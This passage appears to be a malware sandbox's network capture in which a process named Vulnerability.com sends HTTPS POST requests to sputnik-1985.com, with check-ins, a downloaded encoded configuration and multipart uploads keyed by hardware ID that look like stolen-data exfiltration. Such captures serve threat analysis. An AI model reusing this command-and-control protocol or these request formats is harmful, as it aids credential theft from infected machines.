2025-01-10 22:28:05 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49882	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-10 22:28:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 22:28:17 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=89cghbm54cqaroo0mj9uc7kard; expires=Tue, 06 May 2025 16:14:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vMHWj0aw0DSg7xEqSW38J81UQRP9CO5snMVxrxThHgKsP%2FsHPlgSiTWzhnKmnKj7B%2BCzMT9SUphiNjAfZ%2FQBtFd5IhGVcVps64f%2Bfh%2FzS93CMtJyNU%2FtclvfA1UDal5hg1yS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000191f0e871875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1652&rtt_var=646&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1658148&cwnd=153&unsent_bytes=0&cid=6dc34929356a6f2a&ts=11634&x=0"
2025-01-10 22:28:17 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 22:28:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49962	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:17 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: sputnik-1985.com
2025-01-10 22:28:17 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2025-01-10 22:28:18 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t1a0mpfbtcnvqrorkr4e5epco2; expires=Tue, 06 May 2025 16:14:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfB67%2F1hHVNzYaiYrs8G7qkJc8pki%2FEjaMOQD9uJYng6qUgNFaGHDJs4C56%2FnZSmpPAIGbOcAC3hMEo2rgVSmSX9fvEBZzEm1F4kKUq9IVEvHMM2VWPTPZBGvqK2wFwgPXcU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000196acc7c41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1570&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=978&delivery_rate=1843434&cwnd=241&unsent_bytes=0&cid=e10549bfc3c22346&ts=490&x=0"
2025-01-10 22:28:18 UTC	248	IN	Data Raw: 31 63 62 31 0d 0a 37 4e 34 77 59 46 4f 44 46 51 54 4a 4d 34 4d 71 62 55 34 52 69 4c 67 70 36 6f 6f 6c 6f 37 6a 58 72 6d 35 6a 4c 41 67 75 35 53 61 58 2f 45 5a 43 61 62 63 35 4a 72 70 57 6f 52 41 5a 50 47 54 74 6c 41 75 4c 37 67 65 5a 33 72 62 43 48 51 59 41 4b 6c 69 49 42 4e 61 34 55 51 77 67 35 6a 6b 6d 72 45 75 68 45 44 59 31 4d 2b 33 57 43 39 43 6f 51 4d 6e 61 74 73 49 4d 41 6b 64 6e 58 6f 6c 46 68 4c 4a 58 43 44 62 67 63 57 57 6c 58 75 5a 50 43 43 39 37 35 74 46 45 67 75 63 48 6a 35 71 79 31 45 78 5a 44 6b 56 4c 6b 55 65 68 76 30 4d 4c 63 66 34 35 66 2b 74 57 37 51 68 58 62 48 44 74 32 6b 57 4d 37 6b 37 4c 30 4c 2f 4b 44 51 64 47 65 45 65 44 54 6f 53 38 56 41 6b 38 36 57 56 6f 72 31 6e 74 53 51 49 76 4d 36 53 61 54 4a 43 6f 48 34 Data Ascii: 1cb17N4wYFODFQTJM4MqbU4RiLgp6oolo7jXrm5jLAgu5SaX/EZCabc5JrpWoRAZPGTtlAuL7geZ3rbCHQYAKliIBNa4UQwg5jkmrEuhEDY1M+3WC9CoQMnatsIMAkdnXolFhLJXCDbgcWWlXuZPCC975tFEgucHj5qy1ExZDkVLkUehv0MLcf45f+tW7QhXbHDt2kWM7k7L0L/KDQdGeEeDToS8VAk86WVor1ntSQIvM6SaTJCoH4
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 47 4a 68 38 38 64 45 46 74 6e 58 49 45 45 6b 66 4a 4c 51 6a 62 74 4e 7a 37 72 57 65 31 47 43 69 39 38 37 64 74 4c 6d 75 64 48 77 74 4b 39 79 41 59 4f 51 57 56 43 6a 55 4f 47 74 56 55 4e 4e 75 6c 78 61 61 67 52 72 77 67 49 4e 44 4f 79 6d 6d 75 59 36 30 54 56 31 36 53 4d 45 30 39 58 4b 6b 75 4c 42 4e 62 38 56 41 77 77 37 48 64 30 6f 31 72 71 54 52 30 6e 65 75 66 58 53 34 58 69 53 4d 4c 61 73 73 59 47 44 6b 52 75 51 59 70 43 6a 72 77 53 54 48 48 6d 62 79 62 7a 45 63 4a 4e 48 79 74 2f 2f 4a 68 78 79 50 63 4a 32 4a 71 79 77 45 78 5a 44 6d 4a 4a 68 45 65 46 73 31 45 4b 4f 76 4e 33 64 4b 31 63 35 46 6f 4a 4b 58 33 67 32 56 6d 43 35 6b 48 43 30 37 37 46 43 51 5a 4b 4b 67 4c 48 51 35 62 38 43 6b 49 51 37 48 78 71 6f 55 62 68 43 42 42 69 61 71 72 64 52 38 69 77 42 Data Ascii: GJh88dEFtnXIEEkfJLQjbtNz7rWe1GCi987dtLmudHwtK9yAYOQWVCjUOGtVUNNulxaagRrwgINDOymmuY60TV16SME09XKkuLBNb8VAww7Hd0o1rqTR0neufXS4XiSMLassYGDkRuQYpCjrwSTHHmbybzEcJNHyt//JhxyPcJ2JqywExZDmJJhEeFs1EKOvN3dK1c5FoJKX3g2VmC5kHC077FCQZKKgLHQ5b8CkIQ7HxqoUbhCBBiaqrdR8iwB
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 4d 51 6b 46 4a 63 67 7a 66 42 4b 53 2f 52 67 45 37 6f 30 4a 6c 70 56 2f 6d 58 6b 38 7a 50 66 4f 61 54 49 53 6f 48 34 48 58 74 4d 51 4b 45 30 46 6e 54 34 6c 4b 67 62 6c 64 43 6a 48 68 65 6d 4f 76 57 75 70 4c 41 69 68 68 34 4e 70 44 6a 65 6c 4e 79 35 72 37 6a 41 73 5a 44 6a 49 4d 74 6c 4f 46 2f 6d 63 42 50 2b 39 77 63 4f 74 4f 72 31 46 50 4b 33 2b 71 67 67 75 46 34 45 4c 45 31 62 54 47 41 67 52 45 5a 6b 53 4a 52 35 79 7a 56 67 49 39 36 58 31 72 70 56 58 70 51 51 51 6e 64 65 72 62 51 63 69 6d 42 38 62 43 39 5a 52 4d 4e 55 6c 6d 51 59 67 47 75 37 39 63 44 44 62 33 4e 33 6e 6c 53 4b 46 50 41 32 77 72 71 74 5a 43 69 4f 4e 4e 78 64 71 79 77 51 6b 43 53 57 6c 42 67 45 36 41 75 31 59 4f 4f 4f 78 78 5a 71 78 56 35 46 6f 4b 4a 58 2f 6d 6d 67 58 49 37 31 2b 42 67 76 Data Ascii: MQkFJcgzfBKS/RgE7o0JlpV/mXk8zPfOaTISoH4HXtMQKE0FnT4lKgbldCjHhemOvWupLAihh4NpDjelNy5r7jAsZDjIMtlOF/mcBP+9wcOtOr1FPK3+qgguF4ELE1bTGAgREZkSJR5yzVgI96X1rpVXpQQQnderbQcimB8bC9ZRMNUlmQYgGu79cDDb3N3nlSKFPA2wrqtZCiONNxdqywQkCSWlBgE6Au1YOOOxxZqxV5FoKJX/mmgXI71+Bgv
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 44 6a 49 4d 6a 6b 32 63 73 6c 77 4c 50 4f 64 2f 59 61 56 63 36 6b 34 45 4b 33 54 73 31 30 4f 46 37 55 54 41 33 72 2f 65 44 77 70 45 5a 30 62 48 43 73 36 37 53 6b 4a 70 6f 56 42 71 67 6b 48 36 57 68 6c 73 62 4b 54 44 43 34 2f 6b 42 35 6d 61 74 73 4d 46 44 6b 5a 69 51 34 68 41 67 4c 70 55 44 7a 54 75 66 58 53 6a 58 2b 78 44 41 43 64 68 36 74 64 50 68 4f 78 50 79 74 44 31 67 6b 77 47 56 69 6f 55 78 33 47 44 73 31 49 42 4a 36 46 6f 4b 4c 49 52 35 6b 52 50 64 44 50 6d 31 45 75 48 35 45 76 4b 30 72 54 41 41 67 5a 4c 59 30 53 50 56 6f 2b 34 57 67 4d 2f 37 6e 5a 69 72 6c 54 6c 54 77 73 71 66 4b 71 55 43 34 2f 77 42 35 6d 61 6d 75 73 35 51 32 39 51 44 4a 67 4b 6c 2f 78 56 44 6e 47 35 4e 32 71 6f 58 65 6c 48 43 53 56 2f 34 4e 4e 41 68 4f 4e 44 7a 64 4f 77 79 67 30 Data Ascii: DjIMjk2cslwLPOd/YaVc6k4EK3Ts10OF7UTA3r/eDwpEZ0bHCs67SkJpoVBqgkH6WhlsbKTDC4/kB5matsMFDkZiQ4hAgLpUDzTufXSjX+xDACdh6tdPhOxPytD1gkwGVioUx3GDs1IBJ6FoKLIR5kRPdDPm1EuH5EvK0rTAAgZLY0SPVo+4WgM/7nZirlTlTwsqfKqUC4/wB5mamus5Q29QDJgKl/xVDnG5N2qoXelHCSV/4NNAhONDzdOwyg0
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 6f 42 4e 6e 4c 4a 66 44 54 6e 70 66 6d 65 76 56 4f 78 4f 41 79 5a 79 37 64 52 46 67 4b 67 4a 67 64 32 74 6a 46 52 42 62 33 70 58 6c 56 4b 44 6e 56 38 4e 63 66 34 35 66 2b 74 57 37 51 68 58 62 48 72 34 33 6b 61 61 34 55 44 50 31 62 62 65 44 51 78 46 65 45 75 49 51 49 6d 77 56 41 30 33 34 48 4a 73 70 31 62 6b 51 77 41 67 4d 36 53 61 54 4a 43 6f 48 34 48 30 76 74 38 62 41 6b 42 68 57 70 77 45 6b 66 4a 4c 51 6a 62 74 4e 7a 37 72 55 75 70 44 43 79 78 2f 36 74 35 47 69 50 70 49 78 74 32 38 78 78 34 4c 53 57 31 48 6a 30 2b 42 75 6b 41 4f 50 2f 4e 79 64 4c 6b 52 72 77 67 49 4e 44 4f 79 6d 6e 32 50 2b 46 66 43 6d 49 54 61 44 78 64 46 5a 30 44 48 57 38 43 6c 45 67 55 39 6f 53 38 6d 72 56 37 6f 53 77 41 74 65 75 62 58 54 6f 48 74 52 73 66 65 76 38 59 4d 42 30 68 72 Data Ascii: oBNnLJfDTnpfmevVOxOAyZy7dRFgKgJgd2tjFRBb3pXlVKDnV8Ncf45f+tW7QhXbHr43kaa4UDP1bbeDQxFeEuIQImwVA034HJsp1bkQwAgM6SaTJCoH4H0vt8bAkBhWpwEkfJLQjbtNz7rUupDCyx/6t5GiPpIxt28xx4LSW1Hj0+BukAOP/NydLkRrwgINDOymn2P+FfCmITaDxdFZ0DHW8ClEgU9oS8mrV7oSwAteubXToHtRsfev8YMB0hr
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 36 37 58 6b 4a 70 6f 58 52 68 71 46 44 72 51 51 4d 6a 64 4f 37 49 51 59 2f 36 52 73 44 52 75 4d 41 4d 44 45 4e 67 54 59 35 4a 67 72 46 56 42 54 37 6b 4e 79 6a 72 56 76 6b 49 56 32 78 53 35 39 46 48 30 37 49 48 33 70 53 73 6a 41 73 4e 44 6a 49 4d 68 30 36 4c 74 6c 38 42 50 75 4a 6c 5a 36 31 44 34 55 55 46 50 6e 6e 68 33 30 61 46 35 55 54 48 33 4c 37 41 48 67 68 4f 61 55 66 48 43 73 36 37 53 6b 4a 70 6f 56 52 78 76 56 76 6d 52 42 6b 6e 63 75 6e 4d 52 70 69 6f 43 59 48 4c 73 74 31 4d 57 56 68 36 57 34 42 62 77 4b 55 53 42 54 32 68 4c 79 61 74 57 4f 64 50 43 53 4a 68 37 39 78 45 68 2b 46 4f 78 64 4b 32 7a 41 67 46 53 57 39 50 69 30 2b 4a 76 31 30 47 4f 4f 39 2b 61 65 73 66 6f 55 38 58 62 43 75 71 2b 31 43 4c 35 45 71 42 78 66 76 56 54 41 5a 43 4b 68 54 48 53 Data Ascii: 67XkJpoXRhqFDrQQMjdO7IQY/6RsDRuMAMDENgTY5JgrFVBT7kNyjrVvkIV2xS59FH07IH3pSsjAsNDjIMh06Ltl8BPuJlZ61D4UUFPnnh30aF5UTH3L7AHghOaUfHCs67SkJpoVRxvVvmRBkncunMRpioCYHLst1MWVh6W4BbwKUSBT2hLyatWOdPCSJh79xEh+FOxdK2zAgFSW9Pi0+Jv10GOO9+aesfoU8XbCuq+1CL5EqBxfvVTAZCKhTHS
2025-01-10 22:28:18 UTC	260	IN	Data Raw: 4a 4a 2b 52 77 63 4f 6c 6b 34 6b 59 42 4b 32 57 71 78 58 54 47 71 45 61 42 67 6f 7a 56 54 42 63 4f 4d 68 37 4a 42 4a 7a 38 43 6b 4a 32 34 6d 56 30 72 56 4c 33 53 30 67 53 54 63 33 4d 51 59 2f 34 51 4e 62 56 39 59 4a 4d 44 67 34 79 64 63 64 4e 69 61 64 44 46 44 7a 78 63 43 61 55 48 36 46 51 54 33 51 7a 33 39 6c 46 68 75 39 52 30 4a 65 53 32 67 59 47 58 6d 31 62 69 41 54 41 2f 46 52 43 61 62 49 35 4a 71 39 41 6f 52 42 66 66 69 69 2f 69 52 7a 59 75 6c 69 50 77 2f 58 61 54 46 6b 63 4a 41 79 56 42 4e 62 38 46 51 45 6a 38 33 46 6c 76 56 4b 6d 64 6a 45 4c 61 65 66 63 58 4a 6e 57 65 63 62 41 75 4d 6f 62 45 41 4a 2f 54 34 6c 4b 69 61 6f 53 54 48 48 75 4e 7a 36 53 45 61 6b 49 4d 47 49 7a 38 70 6f 54 79 4e 31 45 7a 39 53 79 32 68 31 4d 61 58 42 42 67 56 4f 66 2f 42 Data Ascii: JJ+RwcOlk4kYBK2WqxXTGqEaBgozVTBcOMh7JBJz8CkJ24mV0rVL3S0gSTc3MQY/4QNbV9YJMDg4ydcdNiadDFDzxcCaUH6FQT3Qz39lFhu9R0JeS2gYGXm1biATA/FRCabI5Jq9AoRBffii/iRzYuliPw/XaTFkcJAyVBNb8FQEj83FlvVKmdjELaefcXJnWecbAuMobEAJ/T4lKiaoSTHHuNz6SEakIMGIz8poTyN1Ez9Sy2h1MaXBBgVOf/B
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 33 32 38 34 0d 0a 36 45 76 4e 75 55 52 35 56 6c 50 64 43 4f 34 67 52 37 62 76 78 65 54 78 66 76 56 54 42 63 4f 4d 68 37 4a 42 4a 7a 38 43 6b 4a 32 34 6d 56 30 72 56 4c 33 53 30 67 53 54 63 54 64 54 59 33 76 56 34 50 30 76 74 67 4c 51 51 41 71 51 38 63 63 74 2f 77 61 51 67 36 76 4e 33 37 72 43 61 46 39 44 43 4a 39 37 63 78 61 78 63 5a 41 78 39 2b 79 33 45 34 76 52 58 35 4c 78 77 72 4f 75 68 4a 61 59 61 38 33 59 72 6f 52 75 52 68 64 64 79 61 35 6a 52 76 61 39 77 6e 59 6d 71 4f 4d 56 46 4d 41 4b 6c 37 48 48 4d 37 37 55 52 41 6a 35 33 52 77 71 42 62 66 64 67 77 36 66 75 58 52 53 72 62 57 61 63 7a 62 74 73 4a 4f 4d 46 68 6e 58 49 52 42 69 59 4a 73 44 44 62 31 63 47 69 74 55 61 45 47 54 79 4d 7a 73 75 4d 4c 77 4b 68 34 6a 35 71 74 6a 46 52 42 65 32 6c 43 69 55 Data Ascii: 32846EvNuUR5VlPdCO4gR7bvxeTxfvVTBcOMh7JBJz8CkJ24mV0rVL3S0gSTcTdTY3vV4P0vtgLQQAqQ8cct/waQg6vN37rCaF9DCJ97cxaxcZAx9+y3E4vRX5LxwrOuhJaYa83YroRuRhddya5jRva9wnYmqOMVFMAKl7HHM77URAj53RwqBbfdgw6fuXRSrbWaczbtsJOMFhnXIRBiYJsDDb1cGitUaEGTyMzsuMLwKh4j5qtjFRBe2lCiU
2025-01-10 22:28:18 UTC	1369	IN	Data Raw: 46 48 47 35 4a 53 6a 72 51 36 45 51 54 32 74 77 2b 4d 68 4e 69 2f 35 45 68 75 53 4c 36 77 49 47 54 33 78 63 69 6b 69 76 76 30 4d 49 44 39 39 69 5a 61 56 66 35 6c 34 65 62 44 32 71 31 51 76 51 30 51 65 4a 6d 6f 71 43 54 42 6b 4f 4d 67 79 79 52 34 43 79 56 52 51 67 72 46 42 6f 72 46 44 33 57 41 49 67 55 75 6e 4c 51 63 69 6d 42 38 65 61 37 5a 35 43 51 55 70 37 44 4e 38 55 33 4f 63 48 55 57 61 78 4a 58 6e 6c 53 4b 46 65 54 33 51 68 70 4a 70 5a 79 4c 41 48 68 74 6d 6e 33 67 6f 43 57 47 6b 4c 75 58 71 72 71 31 45 53 4e 2b 4a 4a 57 49 42 64 35 30 38 56 4b 33 58 4d 2b 67 76 47 71 45 69 42 67 6f 79 4d 52 45 46 78 4a 41 79 66 42 4e 62 38 5a 77 45 2f 37 33 42 77 75 68 7a 45 58 77 77 38 64 65 6d 61 42 63 6a 75 42 35 6d 4b 2b 34 77 49 45 41 34 79 48 4e 55 66 32 2b 38 Data Ascii: FHG5JSjrQ6EQT2tw+MhNi/5EhuSL6wIGT3xcikivv0MID99iZaVf5l4ebD2q1QvQ0QeJmoqCTBkOMgyyR4CyVRQgrFBorFD3WAIgUunLQcimB8ea7Z5CQUp7DN8U3OcHUWaxJXnlSKFeT3QhpJpZyLAHhtmn3goCWGkLuXqrq1ESN+JJWIBd508VK3XM+gvGqEiBgoyMREFxJAyfBNb8ZwE/73BwuhzEXww8demaBcjuB5mK+4wIEA4yHNUf2+8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49970	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:18 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=L6EU88F0YQA25X2XTF3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12840 Host: sputnik-1985.com
2025-01-10 22:28:18 UTC	12840	OUT	Data Raw: 2d 2d 4c 36 45 55 38 38 46 30 59 51 41 32 35 58 32 58 54 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 4c 36 45 55 38 38 46 30 59 51 41 32 35 58 32 58 54 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 36 45 55 38 38 46 30 59 51 41 32 35 58 32 58 54 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 Data Ascii: --L6EU88F0YQA25X2XTF3Content-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--L6EU88F0YQA25X2XTF3Content-Disposition: form-data; name="pid"2--L6EU88F0YQA25X2XTF3Content-Disposition: form-data; name="lid"hRjzG3--TR
2025-01-10 22:28:19 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i17n9fctll5so8lffs0r9q4mv6; expires=Tue, 06 May 2025 16:14:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqan0rRPeyXp3iuGAMkKg6I1OlW4O6U2IjoSzkOquBh%2Bt9PwQOl8hMKYj9XYZ%2BIyKmNZO4Ofh87MGHhzLbaAkUw%2FO3tInXxVdcscWKqTt2HvgcbYjbaCKonWAaHthNaCmN%2BW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900019722bd3c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1662&rtt_var=640&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13781&delivery_rate=1686886&cwnd=189&unsent_bytes=0&cid=25a9ae342030c5c4&ts=499&x=0"
2025-01-10 22:28:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:28:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49978	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:19 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=L16E52NWRM8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: sputnik-1985.com
2025-01-10 22:28:19 UTC	15034	OUT	Data Raw: 2d 2d 4c 31 36 45 35 32 4e 57 52 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 4c 31 36 45 35 32 4e 57 52 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 31 36 45 35 32 4e 57 52 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4c 31 36 45 35 32 4e 57 52 4d 38 0d 0a 43 6f 6e 74 65 Data Ascii: --L16E52NWRM8Content-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--L16E52NWRM8Content-Disposition: form-data; name="pid"2--L16E52NWRM8Content-Disposition: form-data; name="lid"hRjzG3--TRON--L16E52NWRM8Conte
2025-01-10 22:28:20 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b3kpjkt4qvnp8n06cgj4jdhuvq; expires=Tue, 06 May 2025 16:14:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zz8rQrkrV4L9GzEmi7e9To6NIBAgGnLzcsPbA047RMLNWlzA0Bj%2FuvDDOVezAfDhJUfG9p7IS98%2FtokUpB2xjXM4lg640wpJ9P8WMAxu6yvRbOSYFeuPNuKSzFnLbfWFfSHm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900019784865c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1639&rtt_var=618&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15967&delivery_rate=1767554&cwnd=189&unsent_bytes=0&cid=f7d5be39f3af935a&ts=507&x=0"
2025-01-10 22:28:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:28:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49985	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:20 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HXQFBOVAWPQP4XL52 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20560 Host: sputnik-1985.com
